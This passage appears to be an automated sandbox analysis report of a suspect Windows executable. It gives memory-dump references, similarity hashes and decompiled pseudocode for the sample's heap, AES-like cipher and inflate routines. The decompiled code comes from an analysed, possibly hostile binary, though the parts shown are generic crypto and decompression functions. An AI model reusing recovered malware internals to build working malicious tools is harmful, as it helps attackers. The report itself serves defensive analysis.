                    0x00402a0c
                    0x00402a0d
                    0x00000000
                    0x004029f9
                    0x004029ef
                    0x00402a45

                    APIs
                    • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Heap$FreeProcessfree
                    • String ID:
                    • API String ID: 3428986607-0
                    • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                    • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                    • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                    • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402E7E Relevance: 3.3, APIs: 2, Instructions: 272COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 34%
                    			E00402E7E(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v44;
				signed char* _t151;
				signed char* _t154;
				signed char* _t155;
				signed char* _t158;
				signed char* _t159;
				signed char* _t160;
				signed char* _t162;
				signed int _t166;
				signed int _t167;
				signed char* _t172;
				signed int* _t245;
				signed int _t262;
				signed int _t263;
				signed int _t278;
				signed int _t279;
				signed int _t289;
				signed int _t303;
				intOrPtr _t344;
				void* _t345;
				signed int _t346;

				_t344 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v44);
					L0040776E();
				}
				_t151 = _a4;
				_t154 =  &(_t151[3]);
				_t155 =  &(_t154[1]);
				_t278 = (( *_t151 & 0x000000ff) << 0x00000018 | (_t151[1] & 0x000000ff) << 0x00000010 |  *_t154 & 0x000000ff) ^  *(_t344 + 8);
				_v20 = _t278;
				_t158 =  &(_t155[3]);
				_t159 =  &(_t158[1]);
				_t160 =  &(_t159[1]);
				_v16 = ((_t154[1] & 0x000000ff) << 0x00000018 | (_t155[1] & 0x000000ff) << 0x00000010 |  *_t158 & 0x000000ff) ^  *(_t344 + 0xc);
				_t162 =  &(_t160[2]);
				_t163 =  &(_t162[1]);
				_t262 = (( *_t159 & 0x000000ff) << 0x00000018 | ( *_t160 & 0x000000ff) << 0x00000010 |  *_t162 & 0x000000ff) ^  *(_t344 + 0x10);
				_v24 = _t262;
				_t166 =  *(_t344 + 0x410);
				_v28 = _t166;
				_v12 = ((_t162[1] & 0x000000ff) << 0x00000018 | (_t163[1] & 0x000000ff) << 0x00000010) ^  *(_t344 + 0x14);
				if(_t166 > 1) {
					_a4 = _t344 + 0x30;
					_v8 = _t166 - 1;
					do {
						_t245 =  &(_a4[8]);
						_a4 = _t245;
						_v24 =  *0x00408FFC ^  *0x00408BFC ^  *0x004093FC ^  *(0x4097fc + (_v16 & 0x000000ff) * 4) ^  *_a4;
						_v16 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_t278 & 0x000000ff) * 4) ^  *(_a4 - 4);
						_v12 =  *0x00408BFC ^  *0x004093FC ^  *0x00408FFC ^  *(0x4097fc + (_t262 & 0x000000ff) * 4) ^  *(_t245 - 0x1c);
						_t262 = _v24;
						_v24 = _t262;
						_t278 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_v12 & 0x000000ff) * 4) ^  *(_t245 - 0x28);
						_t80 =  &_v8;
						 *_t80 = _v8 - 1;
						_v20 = _t278;
					} while ( *_t80 != 0);
					_t166 = _v28;
					_t344 = _v32;
				}
				_t167 = _t166 << 5;
				_t86 = _t344 + 8; // 0x8bf9f759
				_t279 =  *(_t167 + _t86);
				_t88 = _t344 + 8; // 0x40355c
				_t345 = _t167 + _t88;
				_v8 = _t279;
				_t172 = _a8;
				 *_t172 =  *0x004089FC ^ _t279 >> 0x00000018;
				_t172[1] =  *0x004089FC ^ _t279 >> 0x00000010;
				_t97 = _t262 + 0x4089fc; // 0x6bf27b77
				_t172[2] =  *_t97 ^ _v8 >> 0x00000008;
				_t172[3] =  *((_v12 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t104 = _t345 + 4; // 0x33c12bf8
				_t289 =  *_t104;
				_v8 = _t289;
				_t172[4] =  *0x004089FC ^ _t289 >> 0x00000018;
				_t172[5] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[6] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t172[7] =  *((_v20 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t121 = _t345 + 8; // 0x6ff83c9
				_t303 =  *_t121;
				_v8 = _t303;
				_t172[8] =  *0x004089FC ^ _t303 >> 0x00000018;
				_t172[9] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[0xa] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t263 = _t262 & 0x000000ff;
				_t172[0xb] =  *((_v16 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t137 = _t345 + 0xc; // 0x41c1950f
				_t346 =  *_t137;
				_v8 = _t346;
				_t172[0xc] =  *0x004089FC ^ _t346 >> 0x00000018;
				_t172[0xd] =  *0x004089FC ^ _t346 >> 0x00000010;
				_t172[0xe] =  *0x004089FC ^ _t346 >> 0x00000008;
				_t148 = _t263 + 0x4089fc; // 0x6bf27b77
				_t172[0xf] =  *_t148 ^ _v8;
				return _t172;
			}










































                    0x00402e85
                    0x00402e87
                    0x00402e8e
                    0x00402e98
                    0x00402ea1
                    0x00402ea6
                    0x00402ea7
                    0x00402ea7
                    0x00402eac
                    0x00402eca
                    0x00402ed4
                    0x00402ed5
                    0x00402ee0
                    0x00402eef
                    0x00402ef5
                    0x00402eff
                    0x00402f00
                    0x00402f11
                    0x00402f17
                    0x00402f18
                    0x00402f26
                    0x00402f36
                    0x00402f3e
                    0x00402f4c
                    0x00402f4f
                    0x00402f59
                    0x00402f5c
                    0x00402f5f
                    0x00402fbf
                    0x00402fcc
                    0x00402fd6
                    0x00403016
                    0x00403031
                    0x0040303b
                    0x0040303e
                    0x00403041
                    0x00403044
                    0x00403044
                    0x00403047
                    0x00403047
                    0x00403050
                    0x00403053
                    0x00403053
                    0x00403056
                    0x00403059
                    0x00403059
                    0x0040305d
                    0x0040305d
                    0x00403068
                    0x00403078
                    0x0040307b
                    0x0040308f
                    0x0040309a
                    0x004030a4
                    0x004030b8
                    0x004030bb
                    0x004030bb
                    0x004030c4
                    0x004030d1
                    0x004030e5
                    0x004030fa
                    0x0040310e
                    0x00403111
                    0x00403111
                    0x0040311a
                    0x00403127
                    0x0040313b
                    0x0040314e
                    0x00403154
                    0x00403162
                    0x00403165
                    0x00403165
                    0x0040316f
                    0x0040317f
                    0x00403194
                    0x004031a8
                    0x004031ab
                    0x004031b5
                    0x004031b9

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402E98
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402EA7
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrow
                    • String ID:
                    • API String ID: 941485209-0
                    • Opcode ID: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
                    • Instruction ID: 7c46eb61736c4a52f21da4615b0110659747632e7974af7727d2e67ead4b8ec0
                    • Opcode Fuzzy Hash: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
                    • Instruction Fuzzy Hash: 01B1AD75A081D99EDB05CFB989A04EAFFF2AF4E20474ED1E9C5C4AB313C5306505DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004031BC Relevance: 3.3, APIs: 2, Instructions: 271COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 33%
                    			E004031BC(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v48;
				signed char* _t154;
				signed char* _t157;
				signed char* _t158;
				signed char* _t161;
				signed char* _t162;
				signed char* _t165;
				signed int _t169;
				signed int _t170;
				signed char* _t175;
				signed int _t243;
				signed int _t278;
				signed int _t288;
				signed int _t302;
				signed int* _t328;
				signed int _t332;
				signed int* _t342;
				intOrPtr _t343;
				void* _t344;
				signed int _t345;

				_t343 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v48);
					L0040776E();
				}
				_t154 = _a4;
				_t157 =  &(_t154[3]);
				_t158 =  &(_t157[1]);
				_t243 = (( *_t154 & 0x000000ff) << 0x00000018 | (_t154[1] & 0x000000ff) << 0x00000010 |  *_t157 & 0x000000ff) ^  *(_t343 + 0x1e8);
				_v24 = _t243;
				_t161 =  &(_t158[3]);
				_t162 =  &(_t161[1]);
				_v20 = ((_t157[1] & 0x000000ff) << 0x00000018 | (_t158[1] & 0x000000ff) << 0x00000010 |  *_t161 & 0x000000ff) ^  *(_t343 + 0x1ec);
				_t165 =  &(_t162[3]);
				_t166 =  &(_t165[1]);
				_v16 = (( *_t162 & 0x000000ff) << 0x00000018 | (_t162[1] & 0x000000ff) << 0x00000010 |  *_t165 & 0x000000ff) ^  *(_t343 + 0x1f0);
				_t169 =  *(_t343 + 0x410);
				_v36 = _t169;
				_v12 = ((_t165[1] & 0x000000ff) << 0x00000018 | (_t166[1] & 0x000000ff) << 0x00000010) ^  *(_t343 + 0x1f4);
				if(_t169 > 1) {
					_t328 = _t343 + 0x210;
					_a4 = _t328;
					_v8 = _t169 - 1;
					do {
						_t332 =  *0x00409BFC ^  *0x00409FFC;
						_v28 = _t332;
						_v28 = _t332 ^  *0x0040A3FC ^  *(0x40a7fc + (_t243 & 0x000000ff) * 4) ^ _a4[1];
						_v16 =  *0x00409BFC ^  *0x00409FFC ^  *0x0040A3FC ^  *(0x40a7fc + (_v12 & 0x000000ff) * 4) ^  *_t328;
						_v12 = _v28;
						_v20 =  *0x0040A3FC ^  *0x00409BFC ^  *0x00409FFC ^  *(0x40a7fc + (_v16 & 0x000000ff) * 4) ^  *(_t328 - 4);
						_t342 = _a4;
						_t243 =  *0x00409FFC ^  *0x0040A3FC ^  *0x00409BFC ^  *(0x40a7fc + (_v20 & 0x000000ff) * 4) ^  *(_t342 - 8);
						_t328 = _t342 + 0x20;
						_t82 =  &_v8;
						 *_t82 = _v8 - 1;
						_a4 = _t328;
						_v24 = _t243;
					} while ( *_t82 != 0);
					_t343 = _v32;
					_t169 = _v36;
				}
				_t170 = _t169 << 5;
				_t278 =  *(_t343 + 0x1e8 + _t170);
				_t344 = _t343 + 0x1e8 + _t170;
				_v8 = _t278;
				_t175 = _a8;
				 *_t175 =  *0x00408AFC ^ _t278 >> 0x00000018;
				_t175[1] =  *0x00408AFC ^ _t278 >> 0x00000010;
				_t175[2] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[3] =  *((_v20 & 0x000000ff) + 0x408afc) ^ _v8;
				_t288 =  *(_t344 + 4);
				_v8 = _t288;
				_t175[4] =  *0x00408AFC ^ _t288 >> 0x00000018;
				_t175[5] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[6] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[7] =  *((_v16 & 0x000000ff) + 0x408afc) ^ _v8;
				_t302 =  *(_t344 + 8);
				_v8 = _t302;
				_t175[8] =  *0x00408AFC ^ _t302 >> 0x00000018;
				_t175[9] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[0xa] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[0xb] =  *((_v12 & 0x000000ff) + 0x408afc) ^ _v8;
				_t345 =  *(_t344 + 0xc);
				_v8 = _t345;
				_t175[0xc] =  *0x00408AFC ^ _t345 >> 0x00000018;
				_t175[0xd] =  *0x00408AFC ^ _t345 >> 0x00000010;
				_t175[0xe] =  *0x00408AFC ^ _t345 >> 0x00000008;
				_t175[0xf] =  *((_t243 & 0x000000ff) + 0x408afc) ^ _v8;
				return _t175;
			}










































                    0x004031c3
                    0x004031c5
                    0x004031cc
                    0x004031d6
                    0x004031df
                    0x004031e4
                    0x004031e5
                    0x004031e5
                    0x004031ea
                    0x00403206
                    0x00403210
                    0x00403211
                    0x0040321f
                    0x0040322e
                    0x00403234
                    0x0040323f
                    0x00403255
                    0x0040325b
                    0x00403266
                    0x0040327d
                    0x00403285
                    0x00403296
                    0x00403299
                    0x0040329f
                    0x004032a6
                    0x004032a9
                    0x004032ac
                    0x00403323
                    0x0040332f
                    0x0040334b
                    0x0040335a
                    0x0040336c
                    0x0040337b
                    0x00403385
                    0x00403388
                    0x0040338b
                    0x0040338e
                    0x0040338e
                    0x00403391
                    0x00403394
                    0x00403394
                    0x0040339d
                    0x004033a0
                    0x004033a0
                    0x004033a3
                    0x004033a6
                    0x004033ad
                    0x004033bb
                    0x004033cb
                    0x004033ce
                    0x004033e5
                    0x004033f8
                    0x0040340c
                    0x0040340f
                    0x00403418
                    0x00403425
                    0x00403439
                    0x0040344e
                    0x00403462
                    0x00403465
                    0x0040346e
                    0x0040347b
                    0x0040348f
                    0x004034a1
                    0x004034b5
                    0x004034b8
                    0x004034c2
                    0x004034d2
                    0x004034e7
                    0x004034fb
                    0x00403508
                    0x0040350c

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031D6
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031E5
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrow
                    • String ID:
                    • API String ID: 941485209-0
                    • Opcode ID: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
                    • Instruction ID: bcf4991698fce177fafabfcfbf4d003d7da0a1e91b0dfae35dbc96c431f9713a
                    • Opcode Fuzzy Hash: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
                    • Instruction Fuzzy Hash: 43B1A135A081D99EDB05CFB984A04EAFFF2AF8E200B4ED1E6C9D4AB713C5705615DB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004043B7 Relevance: 1.9, APIs: 1, Instructions: 682COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E004043B7() {
				void* __ebx;
				void** __edi;
				void* __esi;
				signed int _t426;
				signed int _t427;
				void* _t434;
				signed int _t436;
				unsigned int _t438;
				void* _t442;
				void* _t448;
				void* _t455;
				signed int _t456;
				signed int _t461;
				signed char* _t476;
				signed int _t482;
				signed int _t485;
				signed int* _t488;
				void* _t490;
				void* _t492;
				void* _t493;

				_t490 = _t492;
				_t493 = _t492 - 0x2c;
				_t488 =  *(_t490 + 8);
				_t485 =  *(_t490 + 0xc);
				_t482 = _t488[0xd];
				_t476 =  *_t485;
				 *(_t490 - 4) =  *(_t485 + 4);
				 *(_t490 + 8) = _t488[8];
				 *(_t490 + 0xc) = _t488[7];
				_t426 = _t488[0xc];
				 *(_t490 - 8) = _t482;
				if(_t482 >= _t426) {
					_t479 = _t488[0xb] - _t482;
					__eflags = _t479;
				} else {
					_t479 = _t426 - _t482 - 1;
				}
				_t427 =  *_t488;
				 *(_t490 - 0x10) = _t479;
				if(_t427 > 9) {
					L99:
					_push(0xfffffffe);
					_t488[8] =  *(_t490 + 8);
					_t488[7] =  *(_t490 + 0xc);
					 *(_t485 + 4) =  *(_t490 - 4);
					 *_t485 = _t476;
					_t320 = _t485 + 8;
					 *_t320 =  *(_t485 + 8) + _t476 -  *_t485;
					__eflags =  *_t320;
					_t488[0xd] =  *(_t490 - 8);
					goto L100;
				} else {
					while(1) {
						switch( *((intOrPtr*)(_t427 * 4 +  &M00404BBD))) {
							case 0:
								goto L7;
							case 1:
								goto L20;
							case 2:
								goto L27;
							case 3:
								goto L50;
							case 4:
								goto L58;
							case 5:
								goto L68;
							case 6:
								goto L92;
							case 7:
								goto L118;
							case 8:
								goto L122;
							case 9:
								goto L104;
						}
						L92:
						__eax =  *(__ebp + 8);
						 *(__esi + 0x20) =  *(__ebp + 8);
						__eax =  *(__ebp + 0xc);
						 *(__esi + 0x1c) =  *(__ebp + 0xc);
						__eax =  *(__ebp - 4);
						__edi[1] =  *(__ebp - 4);
						__ebx = __ebx -  *__edi;
						 *__edi = __ebx;
						__edi[2] = __edi[2] + __ebx -  *__edi;
						__eax =  *(__ebp - 8);
						 *(__esi + 0x34) =  *(__ebp - 8);
						__eax = E00403CFC(__esi, __edi,  *(__ebp + 0x10));
						__eflags = __eax - 1;
						if(__eax != 1) {
							L120:
							_push(__eax);
							L100:
							_push(_t485);
							_push(_t488);
							_t434 = E00403BD6(_t479);
							L101:
							return _t434;
						}
						 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
						E004042AF( *(__esi + 4), __edi) = __edi[1];
						__ebx =  *__edi;
						 *(__ebp - 4) = __edi[1];
						__eax =  *(__esi + 0x20);
						_pop(__ecx);
						 *(__ebp + 8) =  *(__esi + 0x20);
						__eax =  *(__esi + 0x1c);
						_pop(__ecx);
						__ecx =  *(__esi + 0x34);
						 *(__ebp + 0xc) =  *(__esi + 0x1c);
						__eax =  *(__esi + 0x30);
						 *(__ebp - 8) = __ecx;
						__eflags = __ecx - __eax;
						if(__ecx >= __eax) {
							__eax =  *(__esi + 0x2c);
							__eax =  *(__esi + 0x2c) -  *(__ebp - 8);
							__eflags = __eax;
						} else {
							__eax = __eax - __ecx;
							__eax = __eax - 1;
						}
						__eflags =  *(__esi + 0x18);
						 *(__ebp - 0x10) = __eax;
						if( *(__esi + 0x18) != 0) {
							 *__esi = 7;
							goto L118;
						} else {
							 *__esi =  *__esi & 0x00000000;
							__eflags =  *__esi;
							L98:
							_t427 =  *_t488;
							__eflags = _t427 - 9;
							if(_t427 <= 9) {
								_t479 =  *(_t490 - 0x10);
								continue;
							}
							goto L99;
						}
						while(1) {
							L68:
							__eax =  *(__esi + 4);
							__ecx =  *(__esi + 8);
							__edx = __eax;
							__eax = __eax & 0x0000001f;
							__edx = __edx >> 5;
							__edx = __edx & 0x0000001f;
							_t187 = __eax + 0x102; // 0x102
							__eax = __edx + _t187;
							__eflags = __ecx - __edx + _t187;
							if(__ecx >= __edx + _t187) {
								break;
							}
							__eax =  *(__esi + 0x10);
							while(1) {
								__eflags =  *(__ebp + 0xc) - __eax;
								if( *(__ebp + 0xc) >= __eax) {
									break;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									L107:
									_t488[8] =  *(_t490 + 8);
									_t488[7] =  *(_t490 + 0xc);
									_t349 = _t485 + 4;
									 *_t349 =  *(_t485 + 4) & 0x00000000;
									__eflags =  *_t349;
									L108:
									_push( *(_t490 + 0x10));
									 *_t485 = _t476;
									 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
									_t488[0xd] =  *(_t490 - 8);
									goto L100;
								}
								__edx =  *__ebx & 0x000000ff;
								__ecx =  *(__ebp + 0xc);
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__edx = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
							}
							__eax =  *(0x40bca8 + __eax * 4);
							__ecx =  *(__esi + 0x14);
							__eax = __eax &  *(__ebp + 8);
							__edx =  *(__ecx + 4 + __eax * 8);
							__eax = __ecx + __eax * 8;
							__eflags = __edx - 0x10;
							 *(__ebp - 0x14) = __edx;
							__ecx =  *(__eax + 1) & 0x000000ff;
							 *(__ebp - 0xc) = __ecx;
							if(__edx >= 0x10) {
								__eflags = __edx - 0x12;
								if(__edx != 0x12) {
									_t222 = __edx - 0xe; // -14
									__eax = _t222;
								} else {
									__eax = 7;
								}
								__ecx = 0;
								__eflags = __edx - 0x12;
								0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
								__ecx = (__eflags != 0x00000000) - 0x00000001 & 0x00000008;
								__ecx = ((__eflags != 0x00000000) - 0x00000001 & 0x00000008) + 3;
								__eflags = __ecx;
								 *(__ebp - 0x10) = __ecx;
								while(1) {
									__ecx =  *(__ebp - 0xc);
									__edx = __eax + __ecx;
									__eflags =  *(__ebp + 0xc) - __eax + __ecx;
									if( *(__ebp + 0xc) >= __eax + __ecx) {
										break;
									}
									__eflags =  *(__ebp - 4);
									if( *(__ebp - 4) == 0) {
										goto L107;
									}
									__edx =  *__ebx & 0x000000ff;
									__ecx =  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
									 *(__ebp - 4) =  *(__ebp - 4) - 1;
									__edx = ( *__ebx & 0x000000ff) << __cl;
									 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
									__ebx = __ebx + 1;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								}
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								 *(0x40bca8 + __eax * 4) =  *(0x40bca8 + __eax * 4) &  *(__ebp + 8);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + ( *(0x40bca8 + __eax * 4) &  *(__ebp + 8));
								__ecx = __eax;
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								__ecx =  *(__ebp - 0xc);
								__eax = __eax +  *(__ebp - 0xc);
								__ecx =  *(__esi + 8);
								 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
								__eax =  *(__esi + 4);
								__edx = __eax;
								__eax = __eax & 0x0000001f;
								__edx = __edx >> 5;
								__edx = __edx & 0x0000001f;
								_t254 = __eax + 0x102; // 0x102
								__eax = __edx + _t254;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + __ecx;
								__eflags =  *(__ebp - 0x10) + __ecx - __eax;
								if( *(__ebp - 0x10) + __ecx > __eax) {
									L111:
									__edi[9](__edi[0xa],  *(__esi + 0xc)) =  *(__ebp + 8);
									 *__esi = 9;
									__edi[6] = "invalid bit length repeat";
									 *(__esi + 0x20) =  *(__ebp + 8);
									__eax =  *(__ebp + 0xc);
									 *(__esi + 0x1c) =  *(__ebp + 0xc);
									__eax =  *(__ebp - 4);
									__edi[1] =  *(__ebp - 4);
									__ebx = __ebx -  *__edi;
									 *__edi = __ebx;
									__edi[2] = __edi[2] + __ebx -  *__edi;
									__eax =  *(__ebp - 8);
									 *(__esi + 0x34) =  *(__ebp - 8);
									__eax = E00403BD6(__ecx, __esi, __edi, 0xfffffffd);
									goto L101;
								}
								__eflags =  *(__ebp - 0x14) - 0x10;
								if( *(__ebp - 0x14) != 0x10) {
									__eax = 0;
									__eflags = 0;
									do {
										L87:
										__edx =  *(__esi + 0xc);
										 *( *(__esi + 0xc) + __ecx * 4) = __eax;
										__ecx = __ecx + 1;
										_t264 = __ebp - 0x10;
										 *_t264 =  *(__ebp - 0x10) - 1;
										__eflags =  *_t264;
									} while ( *_t264 != 0);
									 *(__esi + 8) = __ecx;
									continue;
								}
								__eflags = __ecx - 1;
								if(__ecx < 1) {
									goto L111;
								}
								__eax =  *(__esi + 0xc);
								__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
								goto L87;
							}
							 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
							__eax = __ecx;
							__ecx =  *(__esi + 0xc);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
							__eax =  *(__esi + 8);
							 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
							 *(__esi + 8) =  *(__esi + 8) + 1;
						}
						__ecx = __ebp - 0x28;
						__eax =  *(__esi + 4);
						 *(__esi + 0x14) =  *(__esi + 0x14) & 0x00000000;
						 *(__ebp - 0x14) = 9;
						__ebp - 0x2c = __ebp - 0x10;
						__ecx = __ebp - 0x14;
						__ecx = __eax;
						__eax = __eax & 0x0000001f;
						__ecx = __ecx >> 5;
						__ecx = __ecx & 0x0000001f;
						__eax = __eax + 0x101;
						__ecx = __ecx + 1;
						 *(__ebp - 0x10) = 6;
						__eax = E0040501F(__eax, __ecx,  *(__esi + 0xc), __ebp - 0x14, __ebp - 0x10, __ebp - 0x2c, __ebp - 0x28,  *((intOrPtr*)(__esi + 0x24)), __edi);
						 *(__ebp - 0xc) = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp - 0xc) - 0xfffffffd;
							L113:
							if(__eflags == 0) {
								__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
								_pop(__ecx);
								 *__esi = 9;
								_pop(__ecx);
							}
							__eax =  *(__ebp + 8);
							_push( *(__ebp - 0xc));
							 *(__esi + 0x20) =  *(__ebp + 8);
							__eax =  *(__ebp + 0xc);
							 *(__esi + 0x1c) =  *(__ebp + 0xc);
							__eax =  *(__ebp - 4);
							__edi[1] =  *(__ebp - 4);
							__ebx = __ebx -  *__edi;
							 *__edi = __ebx;
							__edi[2] = __edi[2] + __ebx -  *__edi;
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							goto L100;
						}
						__eax = E00403CC8( *(__ebp - 0x14),  *(__ebp - 0x10),  *((intOrPtr*)(__ebp - 0x2c)),  *(__ebp - 0x28), __edi);
						__eflags = __eax;
						if(__eax == 0) {
							L116:
							_push(0xfffffffc);
							_t488[8] =  *(_t490 + 8);
							_t488[7] =  *(_t490 + 0xc);
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						 *(__esi + 4) = __eax;
						__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
						_pop(__ecx);
						 *__esi = 6;
						_pop(__ecx);
						goto L92;
						L58:
						 *(__esi + 4) =  *(__esi + 4) >> 0xa;
						__eax = ( *(__esi + 4) >> 0xa) + 4;
						__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
							while(1) {
								L64:
								__eflags =  *(__esi + 8) - 0x13;
								if( *(__esi + 8) >= 0x13) {
									break;
								}
								__eax =  *(__esi + 8);
								__ecx =  *(__esi + 0xc);
								 *(__ecx +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) & 0x00000000;
								 *(__esi + 8) =  *(__esi + 8) + 1;
							}
							__ecx = __esi + 0x14;
							__eax = __esi + 0x10;
